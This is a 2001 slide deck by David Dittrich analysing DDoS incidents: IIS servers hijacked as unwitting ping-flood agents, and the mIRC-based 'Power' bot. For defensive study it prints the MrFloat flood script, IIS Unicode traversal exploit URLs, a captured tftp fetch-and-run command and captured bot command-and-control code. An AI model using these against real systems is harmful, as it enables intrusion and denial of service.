%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %deffont "standard" xfont "helvetica-medium-r", tfont "standard.ttf", tmfont "hoso6.ttf" %deffont "thick" xfont "helvetica-bold-r", tfont "thick.ttf", tmfont "hoso6.ttf" %deffont "typewriter" xfont "courier-medium-r", tfont "typewriter.ttf", tmfont "hoso6.ttf" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% Default settings per each line numbers. %% %default 1 leftfill, size 2, fore "gray20", back "white", font "standard", hgap 0 %default 2 size 7, vgap 10, prefix " ", ccolor "black" %default 3 size 2, bar "gray70", vgap 10 %default 4 size 5, fore "gray20", vgap 30, prefix " ", font "standard" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% Default settings that are applied to TAB-indented lines. %% %tab 1 size 5, vgap 40, prefix " ", icon box "green" 50 %tab 2 size 4, vgap 40, prefix " ", icon arc "yellow" 50 %tab 3 size 3, vgap 40, prefix " ", icon delta3 "white" 40 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %nodefault %size 6.5, font "standard", back "white", ccolor "black" %center, fore "Blue", font "standard", hgap 20, size 6.5 Recent Developments in DDoS %center, fore "Blue", font "standard", hgap 20, size 4.5 Unwitting agents & "Power" %bar "skyblue" 6 15 70 %font "standard", hgap 0 %size 5, fore "darkblue" David Dittrich %size 4.5 dittrich@cac.washington.edu %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Part I: Unwitting agents (patsies) Overview Examples www.whitehouse.gov MrFloat grc.com Power bot %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Part II: Power bot Overview of Power Network setup Signature on victim systems Use for distributed scanning %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Unwitting agents (patsies) NOT reflectors ala Vern Paxson Not necessary to install DDoS agent Remote exploit runs arbitrary program Uses existing operating system features Windows PING.EXE Cannot be identified by: Remote port scan (e.g., RID) File system scanners (e.g., NIPC find_ddos) Anti-virus software Might be identified by: Router flows/network traffic Vulnerability scans (e.g., Nessus) System logs %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Candidates for unwitting agents Some fraction of installed base of ??? Think sadmind-IIS worm Logs found on one worm host: %font "typewriter", hgap 0, size 3, prefix " " % wc -l result.txt 35170 result.txt % grep hacked result.txt | wc -l 459 %font "standard" 1.3% of Windows hosts scanned were vulnerable Think Code Red %font "typewriter", size 3, prefix " " According to estimates from the [CERT/CC] ... more than 150,000 systems were infected by Code Red II within days of its release. %font "standard" What percentage were vulnerable to Code Red? %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 www.whitehouse.gov attack Site taken off-line May 4, 2001 Hundreds of systems worldwide flooding C|Net news story Reports ICMP flood Also claims one ISP identified "DDoS tools" (?) 12 Windows 2000 systems at the UW involved All running Windows NT and 2K One admin finds PING.EXE running Target: www.whitehouse.gov IP AV software finds nothing UNISOG email (next page) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 www.whitehouse.gov (cont) %font "typewriter", hgap 0, size 2, prefix " " Date: Fri, 04 May 2001 14:26:29 -0700 From: Computer Security Officer To: unisog@sans.org Subject: [unisog] DDoS against www.whitehouse.gov The attack exploited vulnerable IIS5 servers on Win2K and WinNT systems. Immediately prior to the attack we see an incoming port 80 connection from IP address 202.102.14.137 (CHINANET Jiangsu province network) to each of the systems that subsequently began pinging 198.137.240.92. The argus log looks in part like this. Fri 05/04 05:18:21 tcp 202.102.14.137.41406 <-> 128.12.177.11.80 EST Fri 05/04 05:18:21 tcp 202.102.14.137.41495 <-> 128.12.157.89.80 EST Fri 05/04 05:18:22 F icmp 128.12.157.89 -> 198.137.240.92 ECO Fri 05/04 05:18:22 F icmp 128.12.177.11 -> 198.137.240.92 ECO Each of the systems reviewed so far had two ping processes running. One of the hosts had the following in its IIS log file. 12:21:36 202.102.14.137 GET /scripts/../../winnt/system32/ping.exe 200 12:29:29 202.102.14.137 GET /scripts/../../winnt/system32/ping.exe 200 While I am surprised that such a simple exploit could work, it looks like it may be exactly what happened. The attack was targeted at less than 2% of the total residence network population so it was probably mapped out earlier. ZDNet has a story running that indicated that we were not the only one used in this way. We are issuing an alert to our dorm network users to update their systems with the relevant security patches. We've been working so hard at cleaning up the linux boxes that we've tended to ignore the Windows boxes. Not any more. Stephen %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 MrFloat Published May 31, 2001 to Packetstorm Security %font "typewriter", hgap 0, size 2.5, prefix " " # DDoS tool written by MrFloat # # This tool is not written for scriptkiddies ddos'ing around, but it's written for # educational purposes: To show how easy it is to make boxes - which are not yours - # do distributed ping attacks. Admins should be aware of bugs in their systems and they # should keep them up-to-date # # This tool can be very dangerous when you exploit NT boxes with a lot of bandwidth, so # only test it if you REALLY know what you're doing. This tool was tested on my home LAN. # # Grtz, MrFloat ( mrfloat@dds.nl ) # # - # Usage: ./ddos.sh hostname # # Place vulnerable hosts in the bcasts file # echo .:: Phreak.nl ::. NT DDoS tool - Written by MrFloat for i in `cat bcasts`; do echo Sending flood request to $i; lynx -dump http://$i/scripts/georgi.bat/..\%C1\%9C..\%C1\%9C..\%C1\%9Cwinnt/system32/cmd.exe\?/c\+ping+-n+65000+-l+64000+-w+5+$1 & done %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 grc.com attack Site taken off-line in June 2001 Large packet (fragmented) ICMP flood Brian McWilliams does story Steve's analysis at: %font "typewriter", hgap 0, size 3, prefix " " http://grc.com/dos/attacklog.htm %font "standard" Flooding from 195 systems All running Windows NT IIS logs show initial probe for: %font "typewriter", hgap 0, size 3, prefix " " GET /scripts/..%c1%9c..%c1%9ccwinnt/system32/cmd.exe?/c+dir+c:\ %font "standard" Vulnerable systems later show execution of: %font "typewriter", hgap 0, size 3, prefix " " ping.exe -n 9999999 -l 65500 -w 0 %font "standard" Even "no raw sockets" wouldn't have saved him %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Power bot Found at UW in July 2001 Involved over 100 systems total All Windows 2000 and NT Multiple DDoS attacks to multiple targets UDP floods ICMP floods Hundreds of reports of scanning %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Overview of Power Runs on Windows NT/2K systems Takes advantage of remotely exploitable IIS Bootstraps itself using tftp Uses same hole for DDoS attacks Based on mIRC client Scripts provide commands Auxiliary program (hexplore.exe) hides mIRC client window Major features IRC command/control Distributed DoS Distributed scanning Distributed BNC Automated update %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Network setup - scanning %font "standard" Exploits IIS Unicode hole %font "typewriter", hgap 0, size 3, prefix " " http://www.cert.org/advisories/CA-2001-11.html %font "typewriter", hgap 0, size 3, prefix " " [07/01/2001 00:04:43.602 GMT-0700] Connection: 1CustXXX.XXXX.XXXXXX.XX.da.uu.net (63.XX.XXX.XXX) on port 80 (tcp). [07/01/2001 00:04:43.922 GMT-0700] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Network setup - exploit After finding vulnerable IIS servers, bootstrap Power %font "typewriter", hgap 0, size 3, prefix " " 2001-07-02 21:39:14 10.0.0.3 - 192.168.1.2 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp.exe+"-i"+10.0.0.3+GET+nt.exe %font "standard" Run nt.exe Opens listening port 12624/tcp Later updates sent to 4836/tcp %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Network setup - installation nt.exe loads: winnt.exe - mirc32.exe binary mirc.ini - mirc32 config file hexplore.exe - Hides client windows remote.ini - Configuration file for bot wins.ava - Code for BNC/Scan/DDoS program win98.ava - Code for BNC/Scan/DDoS program These files have been found in one or more of: %font "typewriter" C:\Inetpub\scripts C:\ C:\i386 %font "standard" Self-encryption/compression used %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Signature on victim systems Output of "nmap" scan %font "typewriter", hgap 0, size 3, prefix " " Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/) Interesting ports on athena.chem.washington.edu (128.95.64.225): (The 65522 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 23/tcp open telnet 25/tcp open smtp 80/tcp open http 100/tcp open newacct 135/tcp open loc-srv 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open listen 1026/tcp open nterm 4836/tcp open unknown 12624/tcp open unknown TCP Sequence Prediction: Class=random positive increments Difficulty=17052 (Worthy challenge) Remote operating system guess: Windows 2000 RC1 through final release %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Connection to 12624/tcp %font "typewriter", hgap 0, size 3, prefix " " % telnet host.victim.edu 12624 Trying 192.168.1.225... Connected to host.victim.edu Escape character is '^]'. %font "typewriter", hgap 0, size 3, prefix " ", fore "Red" Password: %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Process list %font "typewriter", hgap 0, size 2.5, prefix " ", fore "black" FPort v1.33 - TCP/IP Process to Port Mapper Copyright 2000 by Foundstone, Inc. http://www.foundstone.com Pid Process Port Proto Path 884 inetinfo -> 21 TCP C:\WINNT\System32\inetsrv\inetinfo.exe 884 inetinfo -> 25 TCP C:\WINNT\System32\inetsrv\inetinfo.exe 884 inetinfo -> 80 TCP C:\WINNT\System32\inetsrv\inetinfo.exe %fore "red" 1400 winnt -> 100 TCP C:\winnt.exe %fore "black" 444 svchost -> 135 TCP C:\WINNT\system32\svchost.exe 884 inetinfo -> 443 TCP C:\WINNT\System32\inetsrv\inetinfo.exe %fore "red" 1400 winnt -> 2350 TCP C:\winnt.exe 1400 winnt -> 2351 TCP C:\winnt.exe 1400 winnt -> 2352 TCP C:\winnt.exe [hundreds of lines removed . . .] 1400 winnt -> 2647 TCP C:\winnt.exe 1400 winnt -> 2648 TCP C:\winnt.exe %fore "black" 772 termsrv -> 3389 TCP C:\WINNT\System32\termsrv.exe %fore "red" 1152 nt -> 4836 TCP c:\inetpub\scripts\nt.exe 1152 nt -> 12624 TCP c:\inetpub\scripts\nt.exe %fore "black" 444 svchost -> 135 UDP C:\WINNT\system32\svchost.exe 8 System -> 445 UDP 220 winlogon -> 1046 UDP \??\C:\WINNT\system32\winlogon.exe 884 inetinfo -> 1064 UDP C:\WINNT\System32\inetsrv\inetinfo.exe 884 inetinfo -> 3456 UDP C:\WINNT\System32\inetsrv\inetinfo.exe %fore "red" 1152 nt -> 12623 UDP c:\inetpub\scripts\nt.exe %fore "black" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Automated upload %size 2.5, font "typewriter", prefix " " T 2001/06/06 00:38:34.043659 10.10.10.10:3210 -> 192.168.1.1:12624 [AP] bowler.. T 2001/06/06 00:38:35.567124 10.10.10.10:3210 -> 192.168.1.1:12624 [AP] *?!?PL. T 2001/06/06 00:38:38.827927 10.10.10.10:3210 -> 192.168.1.1:12624 [AP] *?!?CM001B0110.2. T 2001/06/06 00:38:48.360328 10.10.10.10:3211 -> 192.168.1.1:4836 [AP] 0000004923C:\wins.ava. T 2001/06/06 00:38:48.538066 10.10.10.10:3211 -> 192.168.1.1:4836 [A] alias connect { .server dysfunction-1.mine.nu 6667 }..on 1:start:{.. run hexplore.exe /hide mIRC*..writeini c:\winnt\win.ini windows run $m ircexe...timerwriteini 0 30 writeini c:\winnt\win.ini windows run $mir cexe.. nick Scanner[208].. .server dysfunction-1.mine.nu 6667.. .ti merconnect 0 30 connect..write -c webservers.txt..if (%scanning != don e) { .http 208.1.1.1 | halt }..}..on 1:connect:{.. timerconnect off.. join #IIS %key..}..on 1:disconnect:{.. server dysfunction-1.mine.nu 6667.. .timerconnect 0 30 connect..}..on 1:t . . . %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %bgrad 0 0 256 0 0 "skyblue" "white" %%pcache 1 1 0 30 Use for distributed scanning Dialog of foo and bar while scanning %size 3, font "typewriter", prefix " " foo: oh damn, its gonna own shitloads foo: on start of the script it will erase everything that it has foo: then scan over foo: they only reboot every few weeks anyways foo: and it will take them 24 hours to scan the whole ip range foo: !scan status Scanner[24]:[SCAN][Status: ][IP: XX.X.XX.108][Port: 80][Found: 319] Scanner[208]:[SCAN][Status: ][IP: XXX.X.XXX.86][Port: 80][Found: 320] . . . foo: almost 1000 and we aren't even close foo: we are gonna own more than we thought foo: i bet 100thousand [11 hours later] Scanner[129]: [SCAN][Status: ][IP: XXX.X.XXX.195][Port: 80][Found: 34] Scanner[128]: [SCAN][Status: ][IP: XXX.X.XXX.228][Port: 80][Found: 67] Scanner[24]: [SCAN][Status: ][IP: XX.XX.XX.42][Port: 80][Found: 3580] Scanner[208]: [SCAN][Status: ][IP: XXX.XXX.XXX.156][Port: 80][Found: 3425] Scanner[65]: [SCAN][Status: ][IP: XX.XX.XXX.222][Port: 80][Found: 3959] bar: cool %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %PAGE %bgrad 0 0 256 0 0 "skyblue" "white" FIN %center, fore "Blue", font "standard", hgap 20, size 8 Questions?